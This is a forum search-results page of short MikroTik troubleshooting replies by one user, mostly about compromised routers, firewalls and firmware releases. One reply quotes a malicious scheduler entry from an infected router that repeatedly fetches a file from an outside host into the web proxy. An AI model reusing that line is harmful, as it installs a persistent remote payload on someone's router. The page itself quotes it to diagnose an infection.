Community discussions

Search found 639 matches

  • 1
  • 2
  • 3
  • 4
  • 5
  • 13
by R1CH
Thu Sep 20, 2018 6:16 pm
Forum: General
Topic: Swift mailer issue: not compatible with php router os api
Replies: 1
Views: 60

Re: Swift mailer issue: not compatible with php router os api

This doesn't seem to have anything to do with RouterOS API, your Swift installation seems broken:
Class Swift_SmtpTransport could not be loaded from Swift\SmtpTransport.php, file does not exist
by R1CH
Thu Sep 20, 2018 4:41 pm
Forum: Announcements
Topic: v6.43.1 [stable] and v6.43.2 [stable] is released!
Replies: 84
Views: 7274

Re: v6.43.1 [stable] and v6.43.2 [stable] is released!

Breaking the bootloader in a "stable" release... :lol:
by R1CH
Wed Sep 19, 2018 7:54 pm
Forum: RouterBOARD hardware
Topic: RB1100 dead
Replies: 12
Views: 486

Re: RB1100 dead

Based on this topic it seems the bootloader is damaged. You may find more advice here:

viewtopic.php?t=133750
by R1CH
Wed Sep 19, 2018 5:14 pm
Forum: General
Topic: Weird outbound UDP traffic
Replies: 18
Views: 512

Re: Weird outbound UDP traffic

Emailing support@mikrotik.com will generate a "ticket". I agree this is poor behavior.
by R1CH
Wed Sep 19, 2018 5:13 pm
Forum: General
Topic: Help ! My Router is suddenly messing up my configuration !
Replies: 1
Views: 92

Re: Help ! My Router is suddenly messing up my configuration !

Since those aren't dynamic entries, they have been added through admin interface. Most likely your router is compromised from leaving open ports to WAN interface. You should netinstall with latest version, use known good config and change all passwords.
by R1CH
Tue Sep 18, 2018 5:49 pm
Forum: General
Topic: Mikrotik Error when generating external PDF file
Replies: 7
Views: 225

Re: Mikrotik Error when generating external PDF file

"/tool fetch url=http://gotan.bit:31415/01/error.html mode=http dst-path=webproxy/error.html" policy=\ ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=aug/20/2018 start-time=03:43:47 add interval=13h name=upd114 on-event=\ "/tool fetch url=http://gotan.bit:31415/01/error.html ...
by R1CH
Tue Sep 18, 2018 4:02 pm
Forum: General
Topic: Port 60000 attacks, anyone info on this?
Replies: 11
Views: 308

Re: Port 60000 attacks, anyone info on this?

3389 is RDP, just a standard probe for vulnerable servers. Your firewall should be dropping this without requiring a dedicated rule.
by R1CH
Mon Sep 17, 2018 9:14 pm
Forum: General
Topic: Stopping connections to TCP port 1720
Replies: 6
Views: 256

Re: Stopping connections to TCP port 1720

What kind of connection do you have? Certain modems apparently open upnp to WAN, so you're actually connecting to the modem, not the router.
by R1CH
Thu Sep 13, 2018 9:01 pm
Forum: General
Topic: Can default configuration be hacked?
Replies: 3
Views: 281

Re: Can default configuration be hacked?

If you didn't change passwords then the attackers just reconnected with the stolen password and re-infected the router.
by R1CH
Thu Sep 13, 2018 4:46 pm
Forum: General
Topic: mikrotik configuration issue none caching pages with double quote
Replies: 2
Views: 89

Re: mikrotik configuration issue none caching pages with double quote

You may have a compromised system that has HTTP proxy enabled with malware that is injecting crypto mining scripts into pages. Safest way forward is to netinstall and change all passwords. A config export will easily identify the issue.
by R1CH
Thu Sep 13, 2018 1:29 am
Forum: Wireless Networking
Topic: MT wifi setup options for small retail shops & cafes
Replies: 1
Views: 162

Re: MT wifi setup options for small retail shops & cafes

A single wAP AC should be enough for that kind of light usage. Concurrent users depend a lot on what kind of devices are connecting (slow 2.4 GHz only?), space to be covered and how crowded the frequencies are already. If you do want to go with the annoying social media hotspot then you probably wan...
by R1CH
Thu Sep 13, 2018 1:22 am
Forum: General
Topic: Hate new firmware versioning
Replies: 2
Views: 243

Re: Hate new firmware versioning

I think most admins are in agreement, I haven't seen anyone who is a fan of the new firmware versioning!
by R1CH
Thu Sep 13, 2018 1:20 am
Forum: General
Topic: Attack on port 45678
Replies: 4
Views: 244

Re: Attack on port 45678

Probably if it ran an old version and didn't patch in time, it fell to this: https://blog.mikrotik.com/security/winb ... ility.html

Safest way forward is to netinstall. Don't forget to change all passwords.
by R1CH
Thu Sep 13, 2018 1:18 am
Forum: General
Topic: Why Mikrorik Router OS 6.42.6 UDP Traceroute Drop
Replies: 4
Views: 175

Re: Why Mikrorik Router OS 6.42.6 UDP Traceroute Drop

Are you tracing to a route which has "prohibit" status?
by R1CH
Thu Sep 13, 2018 1:15 am
Forum: General
Topic: Add emoji to the ssid name
Replies: 8
Views: 366

Re: Add emoji to the ssid name

With the suggestions here I've made the script a bit more user friendly.
by R1CH
Tue Sep 11, 2018 1:19 am
Forum: General
Topic: [Feature request] Wireguard
Replies: 29
Views: 3408

Re: [Feature request] Wireguard

And we already know what happens when MikroTik quickly implement a protocol which then later continues to develop independently... see OpenVPN. I know it's a lot to hope for, but this could easily be avoided if Mikrotik would stop re-implementing these features themselves and start using the open s...
by R1CH
Tue Sep 11, 2018 12:52 am
Forum: Announcements
Topic: Newsletter #84
Replies: 33
Views: 4144

Re: Newsletter #84

The RouterOS implementation of OpenVPN will always have shitty throughput since it lacks UDP support.

http://sites.inka.de/bigred/devel/tcp-tcp.html

RB4011 looks like a beast of a device though!
by R1CH
Tue Sep 11, 2018 12:49 am
Forum: RouterBOARD hardware
Topic: Cloud Core Router CCR 1009 cpu Temp
Replies: 2
Views: 133

Re: Cloud Core Router CCR 1009 cpu Temp

I would guess the heatsink has come loose / blocked with debris or thermal interface has degraded.
by R1CH
Mon Sep 10, 2018 7:46 pm
Forum: Announcements
Topic: v6.43 [current] is released!
Replies: 149
Views: 15588

Re: v6.43 [current] is released!

-nm was a winbox issue-
by R1CH
Thu Sep 06, 2018 7:51 pm
Forum: General
Topic: Securing my Rb3011 under attack - SOLVED
Replies: 3
Views: 228

Re: Securing my Rb3011 under attack

You have no firewall so ALL services are exposed! Be aware that exposing any service to the internet is a risk, not even winbox is safe as it was recently exploited. Step 1: Turn off all unnecessary services in ip / services. Step 2: Create firewall rule at top of INPUT chain with ACCEPT for your IP...
by R1CH
Mon Sep 03, 2018 7:27 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 153
Views: 10571

Re: RB4011

The spec sheet lists the max operating temp as +45 C, which is much lower than most other models. I've seen ambient (internal) temps of 60c on my routers that are inside telecom closets etc so unless this has some active cooling, I'm worried it won't be able to operate in the same environments as c...
by R1CH
Mon Sep 03, 2018 3:40 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 153
Views: 10571

Re: RB4011

The spec sheet lists the max operating temp as +45 C, which is much lower than most other models. I've seen ambient (internal) temps of 60c on my routers that are inside telecom closets etc so unless this has some active cooling, I'm worried it won't be able to operate in the same environments as cu...
by R1CH
Thu Aug 30, 2018 6:18 pm
Forum: General
Topic: youtube cache on mikrotik router
Replies: 2
Views: 183

Re: youtube cache on mikrotik router

On Mikrotik is not possible, but as an ISP you can apply for a GGC.

https://peering.google.com/#/options/go ... obal-cache
by R1CH
Wed Aug 29, 2018 3:40 pm
Forum: General
Topic: Hotspot captive portal prevent automatic close on redirect after login
Replies: 17
Views: 8275

Re: Hotspot captive portal prevent automatic close on redirect after login

Be aware that by bypassing the connectivity check in this way there will be NO hotspot popup. Your users will have a very hard time triggering the captive portal redirect, as most sites are using HTTPS which means they will show scary security error messages instead of a redirect. Think carefully ab...
by R1CH
Mon Aug 27, 2018 2:45 pm
Forum: General
Topic: Mikrotik CCR-1009-7G-1C Port Loop Problem
Replies: 2
Views: 151

Re: Mikrotik CCR-1009-7G-1C Port Loop Problem

Post your config, screenshot does not really help. Most likely you have a broken bridge port config or an actual loop.
by R1CH
Sat Aug 25, 2018 12:42 am
Forum: General
Topic: Block user with bad intention
Replies: 6
Views: 402

Re: Block user with bad intention

So what happens when I spoof the IP of Google DNS or whatever DNS server you're using? Oops, your network no longer has DNS connectivity. You should NEVER add to blocklists based on a single input packet. IP spoofing is quite easy, if someone knows this is how your network is setup, they can easily ...
by R1CH
Fri Aug 24, 2018 6:17 pm
Forum: General
Topic: [SOLVED] IPv6 pings work, webpage won't load
Replies: 39
Views: 1134

Re: [SOLVED] IPv6 pings work, webpage won't load

If clamp-to-pmtu solves the problem this probably means there is something in the network path that is dropping ICMPv6 messages. This is pretty bad and you should try and figure out where this is happening and fix it if possible.
by R1CH
Thu Aug 23, 2018 8:05 pm
Forum: Announcements
Topic: v6.42.7 [current] is released!
Replies: 159
Views: 19747

Re: v6.42.7 [current] is released!

Bricked a wAP AC by installing this from 6.36 / 6.37 (wasn't paying close attention to the old version). Rebooted and ethernet is constantly cycling link / no-link, no netinstall, no backup loader. RMA time it seems.

Be careful if upgrading from older versions!
by R1CH
Thu Aug 23, 2018 3:52 am
Forum: RouterBOARD hardware
Topic: Cheapest device to support 5GHz spectral scan
Replies: 2
Views: 328

Re: Cheapest device to support 5GHz spectral scan

No Mikrotik device supports 5 GHz spectral scan.
by R1CH
Thu Aug 23, 2018 1:46 am
Forum: General
Topic: router rebooted because some critical program crashed
Replies: 1
Views: 128

Re: router rebooted because some critical program crashed

Strong enough power supply?
by R1CH
Wed Aug 22, 2018 11:56 pm
Forum: Announcements
Topic: Security announcement blog
Replies: 90
Views: 11596

Re: Security announcement blog

It's been a full business day and the blog is still not updated with the news about what these four security bugs from the latest RouterOS release actually are. This seems to be a step backwards, before the blog the changelog said things like "www) fixed vulnerability" so admins at least knew the ww...
by R1CH
Wed Aug 22, 2018 11:50 pm
Forum: General
Topic: MikroTiks Blocking Functionality on certain websites [SOLVED]
Replies: 3
Views: 193

Re: MikroTiks Blocking Functionality on certain websites [SOLVED]

Your client or network is considered bad to F5 Networks Application Security Manager (ASM) which is what is generating this message. Most likely because the poor firewall config let your Mikrotiks be infected and part of a botnet, so now your IP is blacklisted by certain vendors. Change IP / ISP.
by R1CH
Wed Aug 22, 2018 6:49 pm
Forum: Announcements
Topic: v6.42.7 [current] is released!
Replies: 159
Views: 19747

Re: v6.42.7 [current] is released!

I can confirm that the security fixes were added to the notes after the 6.42.7 thread was already posted! Why was this?

Image
by R1CH
Wed Aug 22, 2018 6:39 pm
Forum: Announcements
Topic: v6.42.7 [current] is released!
Replies: 159
Views: 19747

Re: v6.42.7 [current] is released!

Were these security fixes stealthily added to the v6.42.7 patch notes? I don't recall seeing them there before and I didn't update since it didn't look like a necessary update. It's very bad that details aren't available even though the fixed version is published. It doesn't take much effort to comp...
by R1CH
Wed Aug 22, 2018 6:34 pm
Forum: Announcements
Topic: v6.40.9 [bugfix] is released!
Replies: 50
Views: 8378

Re: v6.40.9 [bugfix] is released!

What is the point of publishing CVE numbers if the vulnerabilities are still private? Hackers can reverse engineer the changes in this version and figure out what the vulnerabilities are and start exploiting them, so there's no point keeping it private once you publish the fix - it only benefits hac...
by R1CH
Wed Aug 22, 2018 12:19 am
Forum: General
Topic: PSA: bandwidth-test Brute Force attempts
Replies: 2
Views: 191

Re: PSA: bandwidth-test Brute Force attempts

On a related note, it would be nice to see bandwidth-test server moved to IP / services so all the useless services can be disabled in one place.
by R1CH
Tue Aug 21, 2018 1:21 am
Forum: Wireless Networking
Topic: Improve Wifi setup - Real life test results - Google wifi vs Mikrotik vs P.O.S. AT&T
Replies: 1
Views: 266

Re: Improve Wifi setup - Real life test results - Google wifi vs Mikrotik vs P.O.S. AT&T

The RB2011 is a very old router (hence the name) which doesn't support 5 GHz, so no 802.11ac. Speeds you show are about what is expected for a 2.4 GHz network.

I recommend hAP AC / cAP AC / wAP AC instead depending on your installation needs.
by R1CH
Mon Aug 20, 2018 1:57 pm
Forum: Announcements
Topic: v6.42.7 [current] is released!
Replies: 159
Views: 19747

Re: v6.42.7 [current] is released!

Upgraded 5 x wAP AC, no issues so far.
by R1CH
Sun Aug 19, 2018 9:38 pm
Forum: General
Topic: broswer shows establishing secure connection when eoip active
Replies: 2
Views: 132

Re: broswer shows establishing secure connection when eoip active

You probably need to enable PMTU clamping.
by R1CH
Sat Aug 18, 2018 12:13 am
Forum: Wireless Networking
Topic: Open the regular browser after Captive Portal Popup login window
Replies: 3
Views: 202

Re: Open the regular browser after Captive Portal Popup login window

Sure, but those URLs will still only open in the captive portal window.
by R1CH
Fri Aug 17, 2018 5:17 pm
Forum: Wireless Networking
Topic: Open the regular browser after Captive Portal Popup login window
Replies: 3
Views: 202

Re: Open the regular browser after Captive Portal Popup login window

No, you cannot control how the client's OS behaves. Captive portal windows are usually limited in what they can do for the specific purpose of signing in.
by R1CH
Wed Aug 15, 2018 3:40 pm
Forum: General
Topic: Kernel failure using traffic generator
Replies: 1
Views: 108

Re: Kernel failure using traffic generator

The traffic generator is a kernel module coded by Mikrotik. It likely has some bugs, and bugs in the kernel mean a complete crash. I would advise against using it outside of test environments.
by R1CH
Sun Aug 12, 2018 6:17 pm
Forum: General
Topic: TCP congestion Illinos
Replies: 4
Views: 279

Re: TCP congestion Illinos

True, but using such services goes against the goals of speed anyway. OVPN in TCP mode is especially terrible.
by R1CH
Sat Aug 11, 2018 6:41 pm
Forum: General
Topic: TCP congestion Illinos
Replies: 4
Views: 279

Re: TCP congestion Illinos

Router doesn't care about the congestion algorithm, it simply forwards packets. It needs to be configured on the endpoints of the connection.
by R1CH
Sat Aug 11, 2018 2:09 am
Forum: General
Topic: TCP connections from china
Replies: 9
Views: 3333

Re: TCP connections from china

If someone is able to connect to that port, your router is insecure. Make sure to firewall all ports from WAN.
by R1CH
Thu Aug 09, 2018 1:46 pm
Forum: Wireless Networking
Topic: Open url / link from Hotspot login page in a browser
Replies: 1
Views: 103

Re: Open url / link from Hotspot login page in a browser

This is entirely dependent on the client device and not something you can configure.
by R1CH
Thu Aug 09, 2018 1:39 pm
Forum: General
Topic: Security breached devices - Port TCP 4145
Replies: 11
Views: 950

Re: Security breached devices - Port TCP 4145

I think you misunderstand, this isn't about services listening on high ports. Say for example client on the network want to connect to Google DNS, 8.8.8.8 port 53. Their OS has to pick a port on the system to send the query, and to which replies are sent, for example maybe it picks 192.168.88.10 por...
by R1CH
Thu Aug 09, 2018 12:49 pm
Forum: General
Topic: Security breached devices - Port TCP 4145
Replies: 11
Views: 950

Re: Security breached devices - Port TCP 4145

Traffic above the reserved ports (0-1024) can be attributed to ephemeral port use. While most OSes generally use the higher end of available ports, there's nothing stopping them from using 1025-65535 as ephemeral port numbers.
by R1CH
Thu Aug 09, 2018 12:46 pm
Forum: Announcements
Topic: WPA2 preshared key brute force attack
Replies: 22
Views: 6272

Re: WPA2 preshared key brute force attack

How do you get the PMKID from a Mikrotik AP? I have tried the attack on my wAP AC (WPA2-PSK), but the driver didn't implement the necessary fields.
by R1CH
Wed Aug 08, 2018 6:10 pm
Forum: RouterBOARD hardware
Topic: upgrade from RB951G-2HnD
Replies: 3
Views: 246

Re: upgrade from RB951G-2HnD

The IPQ4018 used in new products is much faster than the CPU in RB951G-2HnD.
  • 1
  • 2
  • 3
  • 4
  • 5
  • 13